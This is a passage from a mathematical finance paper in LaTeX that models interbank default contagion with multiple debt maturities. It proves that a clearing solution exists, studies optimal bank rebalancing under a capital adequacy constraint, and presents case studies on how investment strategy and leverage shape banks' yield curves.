Likewise, the bank has liabilities $\sum_{j = 1}^n L_{ij}^k + L_{i0}^k$ at time $t_k$ where $L_{i0}^k \geq 0$ denotes the external obligations of bank $i$ at time $t_k$. To simplify the mathematical expressions below we will define $L_{0i}^l = 0$ for all times $t_l$; furthermore to avoid the need to consider defaults due to the initial setup of the system, we will assume $L_{ij}^0 = 0$ for all pairs of banks $i,j$ so that no obligations are due at time $t_0 = 0$.
As in~\cite{KV16}, when a bank defaults on its obligations at time $t_l$, it also does so for all of its obligations at time $t_k > t_l$ as well. However, in contrast to that work but similarly to~\cite{BBF18}, the recovery on defaulted obligations occurs immediately after the clearing date (i.e., at time $t_l^+$) to account for any delays associated with the bankruptcy procedure. That is, a 0 recovery rate is assumed at the clearing time, but a $\beta \in [0,1]$ recovery of liabilities occurs immediately after.
As mentioned above, thus far, we have ignored the considerations for the cash account $V_i(t_l)$. The evolution of the cash account is due to the reinvestment of the cash account from the prior time step (including any recovery of defaulting assets at time $t_{l-1}$) and the (realized) net payments (following the Gai--Kapadia setting (\cite{GK10})). This provides a recursive formulation for the cash account:
\begin{align*}
V_i(t_l) = (1+&R_i(t_l,\alpha_i(t_{l-1})))\left(V_i(t_{l-1}) + \beta\sum_{k = l}^{\ell} e^{-r(t_k-t_l)} \sum_{j = 1}^n L_{ji}^k \ind{j \text{ defaulted at } t_{l-1}}\right) \\
&+ \sum_{j = 0}^n \left[L_{ji}^l \ind{j \text{ is solvent at } t_l} - L_{ij}^l\right]
\end{align*}
for $l = 1,...,\ell$ and initial condition $V_i(t_0) := x_i(t_0)$.
As in the single maturity setting, for consideration of the capital account, the interbank assets will not be valued at their face value, but rather based on the probability of default (i.e., to distinguish the book value and the realized value).
That is, the obligation at time $t_k$ from bank $j$ to $i$ is valued as $p_{ji}(t_l,t_k) := e^{-r(t_k-t_l)}L_{ji}^k(\beta + (1-\beta)\mathbb{E}[P_j(t_k,t_k) \; | \; \mathcal{F}_{t_l}]) \in \mathcal{L}_{t_l}$ that takes value (almost surely) in the interval $e^{-r(t_k-t_l)}L_{ji}^k\times[\beta,1]$ where $P_j(t_k,t_k,\omega_{t_k})$ is the realized indicator of solvency for bank $j$ at time $t_k$. Defining $P_j(t,t_k) := \mathbb{E}[P_j(t_k,t_k) \; | \; \mathcal{F}_t] \in \mathcal{L}_t$ as the (conditional) probability of solvency for obligations with maturity at time $t_k$ as measured at time $t$, we can write the discounted payments as $p_{ji}(t_l,t_k) = e^{-r(t_k-t_l)}L_{ji}^k (\beta+(1-\beta)P_j(t_l,t_k))$. Thus, the realized balance sheet for bank $i$ has possible write-downs in the value of assets and, therefore, the realized net worth at time $t_l$ is given by
\begin{align*}
K_i(t_l) = V_i&(t_l) + \beta\sum_{j = 1}^n L_{ji}^l \ind{j \text{ defaults at } t_l}\\
&+ \sum_{k = l+1}^\ell e^{-r(t_k-t_l)} \sum_{j = 0}^n [L_{ji}^k (\beta + (1-\beta)P_j(t_l,t_k))\ind{j \text{ did not default before } t_l} - L_{ij}^k].
\end{align*}
\begin{remark}
Recall from Remark~\ref{rem:nonmarketable} that throughout this work we assume that the interbank network is fixed. As such even though future interbank assets have a value determined by $\vec{P}$, these assets are treated as nonmarketable and cannot be used to increase short-term liquidity as encoded in the cash account. Notably, ignoring the effects of changing the network structure, if these interbank assets are treated as both liquid and marketable then the cash account $\vec{V}$ would be identical to $\vec{K}$.
\end{remark}
As previously mentioned, as opposed to the single maturity setting, herein a default can be due to either insolvency (if the bank net worths drop below 0 so that, e.g., either shareholders are able to increase their risk-neutral value by declaring bankruptcy or some covenants have forced the early default) or illiquidity (if the bank cannot meet its obligations with its current cash account). That is, bank $i$ will default at the stopping time $\tau_i$ given by
\begin{equation*}
\tau_i := \inf\{t \geq 0 \; | \; \min\{K_i(t) \; , \; V_i(t)\} < 0\}
\end{equation*}
so that default occurs at the first time that either the realized capital or cash account become negative.
This default condition was studied in~\cite{BBF18} in a different dynamic network context.
\begin{remark}\label{rem:illiquid2}
As in Remark~\ref{rem:literature}\eqref{rem:illiquid}, if only the modeling of illiquidity is desired then the default time can be reformulated such that it only accounts for the cash account, i.e., $\tau_i = \inf\{t \geq 0 \; | \; V_i(t) < 0\}$.
\end{remark}
\begin{remark}\label{rem:alpha}
Consider the following three meaningful levels of the rebalancing parameter $\alpha_i$:
\begin{itemize}
\item If $\alpha_i^0(t_l) := 0$ then bank $i$ will reinvest its entire cash account into the external asset $x_i$ at time $t_l$.
\item If $\alpha_i^1(t_l) := 1$ then bank $i$ will move all of its investments into the risk-free bond at time $t_l$; this includes any prior investment in the external asset $x_i$. Though this is feasible in our setting, we generally consider this to be an extreme scenario.
\item If
\begin{align*}
\alpha_i^L(t_l) &:= \left[\frac{\sum_{k = 0}^l e^{r(t_l-t_k)} \sum_{j = 0}^n [L_{ji}^k\ind{\tau_j > t_k}+\beta\sum_{h = k}^\ell e^{-r(t_h-t_k)}L_{ji}^h \ind{\tau_j = t_k}-L_{ij}^k]}{V_i(t_l)+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_l}}\right]^+\\
&= \left[1 - \frac{x_i(t_l)}{V_i(t_l)+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_l}}\right]^+
\end{align*}
then bank $i$ will use its (risky) external asset position to cover any realized net liabilities, but will never increase its external position above its original level (i.e., if bank $i$ has net interbank assets, the external asset position will be made whole and all additional assets are invested in cash). Notably, if bank $i$ is solvent, this rebalancing parameter falls between the prior two cases, i.e., $\alpha_i^L(t_l) \in [0,1]$.
\end{itemize}
If $\alpha_i(t_l) < 0$ then, implicitly, bank $i$ is shorting its own external assets; by a no-short selling constraint, we assume this cannot occur.
If $\alpha_i(t_l) > 1$ then, similarly, bank $i$ is borrowing at the risk-free rate solely to purchase additional units of the risky asset; as this would produce new obligations, study of such a scenario is beyond the scope of this work.
\end{remark}
\subsection{Mathematical model}\label{sec:Kmaturity-model}
As highlighted within the balance sheet modeling, we can immediately define an equilibrium model for default contagion that is jointly on the net worths ($\vec{K} = (K_1,...,K_n)^\top$), cash accounts ($\vec{V} = (V_1,...,V_n)^\top$), survival probabilities ($\vec{P} = (P_1,...,P_n)^\top$), and default times ($\boldsymbol{\tau} = (\tau_1,...,\tau_n)^\top$). As in the single maturity setting, by convention and without loss of generality we will assume $\tau_i(\omega) = T+1$ if bank $i$ does not default on $\omega \in \Omega$.
In contrast to the single maturity setting, we consider the simpler domain $\mathbb{D} := \prod_{l = 0}^\ell (\mathcal{L}_{t_l}^n \times \mathcal{L}_{t_l}^n \times [\vec{0},\vec{1}]^{|\Omega_{t_l}| \times (\ell-l+1)} \times \{t_0,t_1,...,t_\ell,T+1\}^{|\Omega| \times n})$. That is, we specify $\vec{K},\vec{V}$ are adapted processes, $\vec{P}$ is a collection of adapted processes between 0 and 1, and $\boldsymbol{\tau}$ is a vector of stopping times for this model.
This clearing system $\Psi: \mathbb{D} \to \mathbb{D}$ is mathematically constructed in~\eqref{eq:Kmaturity} with an explicit dependence on the rebalancing parameter $\boldsymbol{\alpha}$:
\begin{align}
\label{eq:Kmaturity} &(\vec{K},\vec{V},\vec{P},\boldsymbol{\tau}) = \Psi(\vec{K},\vec{V},\vec{P},\boldsymbol{\tau};\boldsymbol{\alpha}) \\
\nonumber &\qquad := (\Psi_{\vec{K}}(t_l,\vec{V}(t_l),\vec{P}(t_l,\cdot),\boldsymbol{\tau}) \; , \; \Psi_{\vec{V}}(t_l,\vec{V}(t_{[l-1]\vee 0}),\boldsymbol{\tau};\boldsymbol{\alpha}) \; , \; \Psi_{\vec{P}}(t_l,t_k,\boldsymbol{\tau})_{k = [l+1]\wedge\ell}^{\ell} \; , \; \Psi_{\boldsymbol{\tau}}(\vec{K},\vec{V}))_{l = 0}^{\ell}
\end{align}
where, for any $i = 1,...,n$,
\begin{equation*}
\begin{cases}
\Psi_{\vec{K},i}(t_l,\tilde\vec{V},\tilde\vec{P},\boldsymbol{\tau}) = \tilde V_i + \beta\sum_{j = 1}^n L_{ji}^l\ind{\tau_j = t_l} + \sum_{k = l+1}^{\ell} e^{-r(t_k-t_l)} \sum_{j = 0}^n \left[L_{ji}^k (\beta + (1-\beta)\tilde P_j(t_k))\ind{\tau_j \geq t_l} - L_{ij}^k\right] \\
\Psi_{\vec{V},i}(t_l,\tilde\vec{V},\boldsymbol{\tau};\boldsymbol{\alpha}) = \begin{cases} \begin{array}{l} [1 + R_i(t_l,\alpha_i(t_{l-1}))]\left(\tilde V_i + \beta\sum_{k = l-1}^\ell e^{-r(t_k-t_{l-1})}\sum_{j = 1}^n L_{ji}^k\ind{\tau_j = t_{l-1}}\right) \\ \quad + \sum_{j = 0}^n \left[L_{ji}^l \ind{\tau_j > t_l} - L_{ij}^l\right] \end{array} & \text{if } l > 0 \\ x_i(0) & \text{if } l = 0 \end{cases} \\
\Psi_{\vec{P},i}(t_l,t_k,\boldsymbol{\tau}) = \P(\tau_i > t_k \; | \; \mathcal{F}_{t_l}) \\
\Psi_{\boldsymbol{\tau},i}(\vec{K},\vec{V}) = \inf\{t \geq 0 \; | \; \min\{K_i(t),V_i(t)\} < 0\}.
\end{cases}
\end{equation*}
In comparison to the single maturity setting consider in Section~\ref{sec:1maturity} above, due to recovery rate $\beta$ and the potential dependence of the rebalancing strategy to the capital and cash accounts (see, for instance, $\boldsymbol{\alpha}^L$ in Remark~\ref{rem:alpha}), we can no longer guarantee monotonicity of the clearing problem. However, as will be demonstrated in Theorem~\ref{thm:Kmaturity-exist} below, we will prove the existence of a clearing solution constructively using an extension of the dynamic programming principle formulation of the problem (as in Section~\ref{sec:1maturity-dpp} for the single maturity setting). This, additionally, allows us to immediately conclude that we can construct a Markovian clearing solution.
\begin{theorem}\label{thm:Kmaturity-exist}
Fix the rebalancing strategies $\boldsymbol{\alpha}(t_l,\hat\vec{K},\hat\vec{V}) \in [\vec{0},\vec{1}]^{|\Omega_{t_l}|}$ so that they depend only on the current time $t_l$, capital $\hat\vec{K} \in \mathcal{L}_{t_l}^n$, and cash account $\hat\vec{V} \in \mathcal{L}_{t_l}^n$.
There exists a (finite) clearing solution $(\vec{K}^*,\vec{V}^*,\vec{P}^*,\boldsymbol{\tau}^*) = \Psi(\vec{K}^*,\vec{V}^*,\vec{P}^*,\boldsymbol{\tau}^*)$ to~\eqref{eq:Kmaturity}.
Furthermore, if we have Markovian external assets, $\vec{x}(t_l) = f(\vec{x}(t_{l-1}),\tilde\epsilon(t_l))$ for i.i.d.\ perturbations $\tilde\epsilon$, then there exists a clearing solution such that $(\vec{x}(t_l),\vec{K}^*(t_l),\vec{V}^*(t_l),\vec{P}^*(t_l,t_k)_{k = l}^\ell,\boldsymbol{\iota}^*(t_l))_{l = 0}^\ell$ is Markovian where $\boldsymbol{\iota}^*(t_l) := \ind{\boldsymbol{\tau}^* \geq t_l}$ is the realized solvency process.
\end{theorem}
\begin{proof}
We will prove the existence of a clearing solution $(\vec{K}^*,\vec{V}^*,\vec{P}^*,\boldsymbol{\tau}^*)$ to~\eqref{eq:Kmaturity} constructively. Specifically, as in the dynamic programming principle formulation~\eqref{eq:1maturity-dpp} for the single maturity setting, consider the mappings $\hat\Psi$ of the time, solvent institutions, and prior cash account into the current clearing solution. That is, we define $\hat\Psi$ by
\begin{align*}
&\hat\Psi(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) := \left(\begin{array}{c}\hat\Psi_{\vec{K}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) \\ \hat\Psi_{\vec{V}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) \\ \hat\Psi_{\vec{P}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota})\end{array}\right) \\
\nonumber &=
\FIX_{(\tilde\vec{K},\tilde\vec{V},\tilde\vec{P}) \in \hat\mathbb{D}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota})} \left(\begin{array}{l}
\begin{array}{l} \tilde\vec{V} + \beta(\vec{L}^l)^\top\diag{\boldsymbol{\iota}}\ind{\tilde\vec{K}\wedge\tilde\vec{V} < \vec{0}}\\ \qquad + \sum\limits_{k = l+1}^\ell e^{-r(t_k-t_l)} \left[(\vec{L}^k)^\top\diag{\boldsymbol{\iota}}(\beta\vec{1} + (1-\beta)\tilde\vec{P}(t_k)) - \vec{L}^k \vec{1}\right] \end{array} \\
\begin{cases} (I + \diag{\vec{R}(t_l,\boldsymbol{\alpha}(t_{l-1},\hat\vec{K},\hat\vec{V}))})\hat\vec{V} + (\vec{L}^l)^\top\diag{\boldsymbol{\iota}}\ind{\tilde\vec{K}\wedge\tilde\vec{V} \geq \vec{0}} - \vec{L}^l\vec{1} &\text{if } l > 0 \\ \vec{x}(0) &\text{if } l = 0 \end{cases} \\
\left(\begin{cases}
\left[\sum\limits_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}})\hat\Psi_{\vec{P},t_k}(t_{l+1},\vec{F}_l(\tilde\vec{K},\tilde\vec{V},\boldsymbol{\iota})(\omega_{t_l}))(\omega_{t_{l+1}})}{\P(\omega_{t_l})}\right]_{\omega_{t_l} \in \Omega_{t_l}} &\text{if } l < k \\
\diag{\boldsymbol{\iota}}\ind{\tilde\vec{K}\wedge\tilde\vec{V} \geq \vec{0}} &\text{if } l = k
\end{cases}\right)_{k = l}^{\ell}
\end{array}\right)
\end{align*}
with \[\vec{F}_l(\tilde\vec{K},\tilde\vec{V},\boldsymbol{\iota}) := \left(\tilde\vec{K} \, , \, \tilde\vec{V} + \beta\sum_{k = l}^{\ell} (\vec{L}^k)^\top\diag{\boldsymbol{\iota}}\ind{\tilde\vec{K}\wedge\tilde\vec{V} < \vec{0}} \, , \, \diag{\boldsymbol{\iota}}\ind{\tilde\vec{K}\wedge\tilde\vec{V} \geq \vec{0}}\right)\]
for any $l = 0,1,...,\ell$ and the fixed points taken on the lattice
\begin{align*}
\mathbb{D}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) &:= \mathbb{D}_{\vec{K}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) \times \mathbb{D}_{\vec{V}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) \times [\vec{0},\vec{1}]^{|\Omega_{t_l}| \times (\ell-l+1)} \\
\mathbb{D}_{\vec{K}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) &:= \left\{\vec{K} \in \mathcal{L}_{t_l}^n \; \left| \; \vec{K} \in \mathbb{D}_{\vec{V}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) + [\vec{0},\beta(\vec{L}^l)^\top\boldsymbol{\iota}] + \sum_{k = l+1}^\ell e^{-r(t_k-t_l)} ([\beta(\vec{L}^k)^\top\boldsymbol{\iota},(\vec{L}^k)^\top\boldsymbol{\iota}] - \vec{L}^k\vec{1}) \right.\right\} \\
\mathbb{D}_{\vec{V}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) &:= \begin{cases}
\left\{\vec{V} \in \mathcal{L}_{t_l}^n \; \left| \; \vec{V} \in (I+\diag{\vec{R}(t_l,\boldsymbol{\alpha}(t_{l-1},\hat\vec{K},\hat\vec{V}))})\hat\vec{V} + [\vec{0},(\vec{L}^l)^\top\boldsymbol{\iota}] - \vec{L}^l\vec{1}\right.\right\} &\text{if } l > 0 \\
\{\vec{x}(0)\} &\text{if } l = 0. \end{cases}
\end{align*}
As the problem used to define $\hat\Psi$ is a monotonic mapping on a lattice (proven by inspection for $\hat\Psi_{\vec{K}},\hat\Psi_{\vec{V}}$ and by a simple induction argument for $\hat\Psi_{\vec{P}}$), we can apply Tarski's fixed point theorem to guarantee the existence of a greatest fixed point (i.e., the mapping $\FIX$ is well-defined in this case for every feasible combination of inputs).
Let $(\vec{K}^*,\vec{V}^*,\vec{P}^*)$ be the realized solution from $\hat\Psi(0,\vec{0},\vec{x}(0),\vec{1})$ and define $\boldsymbol{\tau}^*: = \Psi_{\boldsymbol{\tau}}(\vec{K}^*,\vec{V}^*)$. (We wish to note that the initial value for $\hat\vec{K}$ taken here as $\vec{0}$ is an arbitrary choice as this term is never utilized.)
As in the proof of Proposition~\ref{prop:1maturity-dpp}, we will seek to demonstrate that $(\vec{K}^*,\vec{V}^*,\vec{P}^*,\boldsymbol{\tau}^*)$ is a fixed point to~\eqref{eq:Kmaturity} by proving that $\vec{P}^*(t_l,t_k) = \Psi_{\vec{P}}(t_l,t_k,\boldsymbol{\tau}^*)$ for all times $t_l \leq t_k$.
First, at maturity times, $\vec{P}^*(t_l,t_l) = \prod_{k = 0}^l \ind{\min\{\vec{K}^*(t_l),\vec{V}^*(t_l)\} \geq 0} = \ind{\boldsymbol{\tau}^* > t_l} = \P(\boldsymbol{\tau}^* > t_l | \mathcal{F}_{t_l})$ by construction.
Second, consider $l < k$ and assume $\vec{P}^*(t_{l+1},t_k) = \Psi_{\vec{P}}(t_{l+1},t_k,\boldsymbol{\tau}^*)$. By definition of $\hat\Psi_{\vec{P},t_k}$, we can construct $\vec{P}^*(t_l,t_k)$ as follows:
\begin{align*}
P_i^*(t_l,t_k,\omega_{t_l}) &= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \hat\Psi_{\vec{P},t_k,i}(t_{l+1},\vec{K}^*(t_l),\vec{V}^*(t_l)+\beta\sum_{k=l}^\ell(\vec{L}^k)^\top\ind{\boldsymbol{\tau}^* = t_l},\ind{\boldsymbol{\tau}^* > t_l})(\omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) P_i^*(t_{l+1},t_k,\omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \Psi_{\vec{P},i}(t_{l+1},t_k,\boldsymbol{\tau}^*)(\omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \P(\tau_i^* > t_k | \mathcal{F}_{t_{l+1}})(\omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\tau_i^* > t_k , \omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \P(\tau_i^* > t_k | \mathcal{F}_{t_l})(\omega_{t_l}) = \Psi_{\vec{P},i}(t_l,t_k,\boldsymbol{\tau}^*)(\omega_{t_l}).
\end{align*}
Therefore, we have constructed a process that clears~\eqref{eq:Kmaturity}. To prove that the enlarged process is Markovian, as with the Lemma~\ref{lemma:markov}, we can simply observe that
\begin{align*}
&(\vec{K}^*(t_l),\vec{V}^*(t_l),\vec{P}^*(t_l,t_k)_{k = l}^\ell) = \hat\Psi(t_l,\boldsymbol{\iota}^*(t_l),\vec{V}^*(t_{l-1});\vec{x}(t_l)) \\ &\qquad \qquad= \hat\Psi(t_l,\diag{\boldsymbol{\iota}^*(t_{l-1})}\ind{\vec{K}^*(t_{l-1})\wedge\vec{V}^*(t_{l-1}) \geq \vec{0}},\vec{V}^*(t_{l-1});f(\vec{x}(t_{l-1}),\tilde\epsilon(t_l))).
\end{align*}
From this, the result is immediate.
\end{proof}
\subsection{Optimal rebalancing}\label{sec:Kmaturity-opt}
Thus far, we have assumed that the rebalancing strategies $\boldsymbol{\alpha}$ are known and fixed solely based on the composition of the cash account. However, in practice, the banks will seek to optimize their own strategy $\alpha_i$ so as to maximize their utility subject to certain regulatory constraints.
In particular, herein, we will consider the setting in which banks must satisfy a short-term capital adequacy constraint at each time point $t_l$ for $l = 0,1,...,\ell-1$.
This regulatory requirement, imposed by the Basel accords, is such that the ratio of the capital to the risk-weighted assets needs to exceed some minimal ratio. That is, assuming the risk-weights for the risk-free and all interbank assets are 0, $\alpha_i(t_l) \in [0,1]^{|\Omega_{t_l}|}$ is constrained such that
\[\frac{K_i(t_l)}{w_i(1-\alpha_i(t_l))(V_i(t_l)+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_{l-1}})} \geq \theta\]
for risk-weight $w_i > 0$ and minimal threshold $\theta > 0$.
(As banks only rebalance when they are solvent, we can assume wlog that $K_i(t_l),V_i(t_l) \geq 0$.)
That is, assuming bank $i$ is solvent at time $t_l$, bank $i$ is bounded on its investment in its external assets by
\[\alpha_i(t_l) \geq 1 - \frac{K_i(t_l)}{w_i\theta (V_i(t_l)+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_{l-1}})}.\]
We wish to note that $\alpha_i(t_l) \leq 1$ automatically so long as bank $i$ is solvent and this capital ratio constraint is satisfied.
Under this regulatory setting, bank $i$ aims to optimize:
\begin{align}\label{eq:Kmaturity-opt}
\alpha_i^*(t_l,\omega_{t_l}) &= \argmax_{\alpha_i \in [0,1]} \left\{U_i(\alpha_i;t_l,\omega_{t_l}) \; | \; \alpha_i \geq 1 - \frac{K_i(t_l,\omega_{t_l})}{w_i\theta (V_i(t_l,\omega_{t_l})+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_{l-1}}(\omega_{t_l}))}\right\}
\end{align}
for some quasiconcave utility function $U_i: [0,1] \to \mathbb{R}$ (which may also depend on the time and current state of the external market) at every time $t_l$ and state $\omega_{t_l} \in \Omega_{t_l}$.
\begin{example}\label{ex:Kmaturity-opt}
Assume bank $i$'s utility $U_i$ is nondecreasing in its investment in its risky (external) asset, i.e., nonincreasing in $\alpha_i$. Then~\eqref{eq:Kmaturity-opt} can trivially be solved in closed form, i.e.,
\[\alpha_i^*(t_l,\omega_{t_l}) = \left[1 - \frac{K_i(t_l,\omega_{t_l})}{w_i \theta (V_i(t_l,\omega_{t_l})+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_{l-1}}(\omega_{t_l}))}\right]^+\]
at every time $t_l$ and state $\omega_{t_l} \in \Omega_{t_l}$.
The monotonicity of the utility function is natural for two (overlapping) reasons. First, as portfolio managers are rewarded for high returns but have only limited costs on the downside, they are incentivized to take outsized risks; that is, a portfolio manager would attempt to invest as much as allowed in the risky asset. Second, as we assume the dynamics of the external assets are independent of the investments made, this can be viewed as the ``ideal'' portfolio for bank $i$; as such, the bank would seek to invest as much as possible into this risky position. In either case, the result for bank $i$ is a utility function that is nonincreasing in $\alpha_i$.
\end{example}
\subsection{Case studies}\label{sec:Kmaturity-cs}
As in Section~\ref{sec:1maturity-cs}, for the purposes of these case studies, we will consider the tree model $(\Omega^n,\mathcal{F}^n,(\mathcal{F}_{l\Delta t}^n)_{l = 0}^{T/\Delta t},\P^n)$ as constructed in~\cite{he1990convergence} and replicated in Section~\ref{sec:setting-tree}. Likewise, we will assume that the external assets follow the geometric random walk~\eqref{eq:gbm}.
Furthermore, we will assume the Gai--Kapadia setting (\cite{GK10}) in which there is a zero recovery rate $\beta = 0$.
We will consider three primary case studies within this section to demonstrate the impacts of financial contagion on the term structure of bank debt. We define the term structure or yield curve of bank debt at time $t = 0$ through the interest rates $R_i^*(t_l) = P_i(0,t_l)^{-1/t_l}-1$ so that $(1+R_i^*(t_l))^{t_l} = 1/P_i(0,t_l)$.
First, we will present a sample yield curve (as measured at time $0$) under varying investment strategies $\boldsymbol{\alpha}$.
Second, we will vary the leverage of the banks in the system in order to investigate the sensitivity of this systemic term structure to the initial balance sheet of the banks.
Third, we will investigate a core-periphery network model to study a larger system and investigate the impacts of localized stresses on the term structure of larger system.
\begin{remark}
All clearing solutions computed herein are found via the Picard iteration of~\eqref{eq:Kmaturity} beginning from the assumption that no banks will ever default. That is, these computations are accomplished without application of the constructive dynamic programming approach presented in the proof of Theorem~\ref{thm:Kmaturity-exist}. As this process converged for all examples considered in this work, we suspect that the monotonicity of~\eqref{eq:Kmaturity} may be stronger than could be proven herein (which provides, e.g., a guarantee for the existence of a maximal clearing solution).
\end{remark}
\subsubsection{Systemic term structure and investment strategies}\label{sec:Kmaturity-cs-term}
First, we want to consider the yield curve (as measured at time $t = 0$) under the network valuation adjustment under varying investment strategies. Specifically, we will consider the same $n = 2$ network as in Section~\ref{sec:1maturity-cs-path} but where all obligations $\vec{L}_0$ are split randomly (uniformly) over $(t_l)_{l = 1}^\ell$. Due to the random split of obligations over time, the banks in this example are no longer symmetric institutions. We consider only a single split of the obligations as the purpose of this case study is to understand the possible shapes of the term structure under varying rebalancing strategies $\boldsymbol{\alpha}$. In particular, we will study three meaningful rebalancing structures: all investments are made in the external asset only ($\boldsymbol{\alpha}^0$ as provided in Remark~\ref{rem:alpha}), all surplus interbank payments are held in the risk-free asset ($\boldsymbol{\alpha}^L$ as defined in Remark~\ref{rem:alpha}), and the optimal investment strategy ($\boldsymbol{\alpha}^*$ as given in Example~\ref{ex:Kmaturity-opt} with risk-weight $w_i = 2$ for $i \in \{1,2\}$ and threshold $\theta = 0.08$ to match the Basel II Accords).
\begin{figure}[h]
\centering
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankTerm-alpha-1.eps}
\caption{Bank $1$}
\label{fig:term-1}
\end{subfigure}
~
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankTerm-alpha-2.eps}
\caption{Bank $2$}
\label{fig:term-2}
\end{subfigure}
\caption{Section~\ref{sec:Kmaturity-cs-term}: The term structure for banks $1$ and $2$ for varying investment strategies $\alpha$.}
\label{fig:term}
\end{figure}
Figure~\ref{fig:term} displays the systemic term structure for both banks in this system. Notably, though these interest rates are similar for the two institutions, they are not identical due to the aforementioned random splitting of the obligations over the 10 time periods.
We would also like to highlight that the yield curve for both banks has an inverted shape, i.e., the interest rate for longer dated maturities is lower than some short-term obligations. Inverted yield curves are typically seen as precursors of economic distress; here the probabilities of default are largely driven by contagion as, e.g., bank $1$ will never default so long as bank $2$ makes all of its payments in full (bank $2$ will default in fewer than 0.7\% of paths under all three investment strategies if bank $1$ pays in full).
Comparing the different investment strategies makes clear that $\boldsymbol{\alpha}^L$ is the least risky strategy, i.e., the interest rates are dominated by those of $\boldsymbol{\alpha}^0,\boldsymbol{\alpha}^*$. This is as expected as, so long as the bank is healthy, it holds all surplus assets in the risk-free asset, otherwise it draws down its cash account to pay off obligations.
Surprisingly, however, $\boldsymbol{\alpha}^*$ results in higher equilibrium interest rates than $\boldsymbol{\alpha}^0$. That is, imposing a regulatory constraint on investments through $\boldsymbol{\alpha}^*$ leads to greater probabilities of default than solely investing in the risky (external) asset $\boldsymbol{\alpha}^0$. Though, naively, it may seem counterintuitive that the most volatile investing strategy ($\boldsymbol{\alpha}^0$) is \emph{not} the riskiest ex post, we conjecture this is due to the pro-cyclicality of the capital adequacy requirement (see also, e.g.,~\cite{banerjee2021price}).
Specifically, when ignoring the possibility of counterparty risks (i.e., assuming all interbank assets are fulfilled in full) bank $2$ defaults under more scenarios when both banks follow $\boldsymbol{\alpha}^0$ than when they follow $\boldsymbol{\alpha}^*$.
When accounting for the network effects, the pro-cyclicality of the capital adequacy regulation implies that banks are forced to move their investments into the risk-free asset when under stress. This means that once a bank is stressed, the cash account has lower volatility and the institution is less able to recover when the external asset value increases; because of default contagion, once a bank defaults it will drag its counterparties down as well potentially precipitating a cycle of contagion.
We wish to conclude this case study by commenting briefly on the dependence of $\boldsymbol{\alpha}^*$ on the risk-weights $w := w_1 = w_2$.
If this risk-weight is set too low (below approximately $0.52$ for this example), then the banks will not be constrained at all by the regulatory environment. Therefore, under such a setting, the resulting interest rates are identical to those under $\boldsymbol{\alpha}^0$.
Conversely, if this risk-weight is set too high (above approximately $2.34$ for this example), then the banks will not be able to invest in the risky (external) asset at all due to the regulatory constraints. Therefore, under such a setting, the resulting interest rates are 0 (identical to those under $\boldsymbol{\alpha}^1$ which are not displayed above) due to the construction of this system.
Around these threshold interest rates, the term structures can be highly sensitive to the regulatory environment. Therefore naively, and heuristically, setting regulatory constraints can result in large unintended risks. We wish to highlight the recent works of~\cite{feinstein2020capital,banerjee2021price} which provide discussions on determining risk-weights to be consistent with systemic risk models.
\subsubsection{Dependence on leverage}\label{sec:Kmaturity-cs-leverage}
Having explored the impact of the investment strategy on the yield curve in Section~\ref{sec:Kmaturity-cs-term}, we now wish to explore how the (initial) leverage of the banking book can impact the shape of the term structure. Specifically, as will be demonstrated with the numerical experiments herein, we find a normal term structure when the leverage is low enough but becomes inverted for riskier scenarios.
As with Section~\ref{sec:Kmaturity-cs-term}, we consider a variation of the $n = 2$ network of Section~\ref{sec:1maturity-cs-path} with $\ell = 10$ time steps where we will vary only the interbank assets and liabilities.
The banking book leverage ratio, i.e., assets over equity assuming all debts are paid in full, at time $t = 0$ for bank $1$ is given by:
\[\lambda_1 := \frac{x_1(0) + \sum_{l = 0}^\ell L_{21}^l}{x_1(0) - \sum_{l = 0}^\ell L_{10}^l} = 1.5 + \bar L_{21}\]
for $\bar L_{21} = \sum_{l = 0}^\ell L_{21}^l \geq 0$ (where $x_1(0) = 1.5$ and $\sum_{l = 0}^{\ell} L_{10}^\ell = 0.5$ by construction); similarly $\lambda_2 := 1.5 + \bar L_{12}$ for $\bar L_{12} = \sum_{l = 0}^\ell L_{12}^l \geq 0$.
